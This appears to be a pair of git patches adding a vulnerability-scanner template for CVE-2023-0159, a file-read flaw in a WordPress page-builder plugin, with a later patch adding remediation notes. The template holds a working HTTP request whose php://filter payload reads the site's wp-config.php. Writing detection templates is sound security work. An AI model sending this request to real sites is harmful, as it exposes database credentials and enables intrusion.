From 279bcccc339263063d2e5216d32db8782952e6e6 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 31 Mar 2024 12:55:33 +0530 Subject: [PATCH 1/2] Added template for CVE-2023-0159 --- http/cves/2023/CVE-2023-0159.yaml | 46 +++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 http/cves/2023/CVE-2023-0159.yaml diff --git a/http/cves/2023/CVE-2023-0159.yaml b/http/cves/2023/CVE-2023-0159.yaml new file mode 100644 index 0000000000..012b96a8e4 --- /dev/null +++ b/http/cves/2023/CVE-2023-0159.yaml @@ -0,0 +1,46 @@ +id: CVE-2023-0159 + +info: + name: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE + author: c4sper0 + severity: high + description: | + The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains. + reference: | + - https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/ + - https://github.com/im-hanzou/EVCer + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/xu-xiang/awesome-security-vul-llm + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-0159 + epss-score: 0.00199 + epss-percentile: 0.56869 + cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:* + metadata: + vendor: wprealize + product: extensive_vc_addons_for_wpbakery_page_builder + framework: wordpress + publicwww-query: "/wp-content/plugins/extensive-vc-addon/" + tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"status":"success","message":"Items are loaded","data":' + + - type: status + status: + - 200 \ No newline at end of file From 559ba29603ec2a2b636da709d48be7ed734d7387 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 31 Mar 2024 23:15:32 +0530 Subject: [PATCH 2/2] added remediation --- http/cves/2023/CVE-2023-0159.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-0159.yaml b/http/cves/2023/CVE-2023-0159.yaml index 012b96a8e4..6f79116065 100644 --- a/http/cves/2023/CVE-2023-0159.yaml +++ b/http/cves/2023/CVE-2023-0159.yaml @@ -6,11 +6,13 @@ info: severity: high description: | The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains. + remediation: Fixed in 1.9.1 reference: | - https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/ - https://github.com/im-hanzou/EVCer - https://github.com/nomi-sec/PoC-in-GitHub - https://github.com/xu-xiang/awesome-security-vul-llm + - https://wordpress.org/plugins/extensive-vc-addon/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -23,7 +25,7 @@ info: product: extensive_vc_addons_for_wpbakery_page_builder framework: wordpress publicwww-query: "/wp-content/plugins/extensive-vc-addon/" - tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi + tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon http: - raw: @@ -43,4 +45,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200